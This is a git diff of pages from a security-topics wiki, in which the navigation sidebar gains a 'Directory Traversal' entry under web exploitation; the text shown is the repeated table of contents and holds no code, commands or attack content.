        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -217,22 +217,6 @@

Methodology

- - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/AlwaysInstallElevated Group Policy.html b/docs/Post Exploitation/Privilege Escalation/Windows/AlwaysInstallElevated Group Policy.html index 34f2b246..8628ac58 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/AlwaysInstallElevated Group Policy.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/AlwaysInstallElevated Group Policy.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -189,22 +189,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/AutoRun Programmes.html b/docs/Post Exploitation/Privilege Escalation/Windows/AutoRun Programmes.html index d04c6a93..b36e925f 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/AutoRun Programmes.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/AutoRun Programmes.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -185,22 +185,6 @@

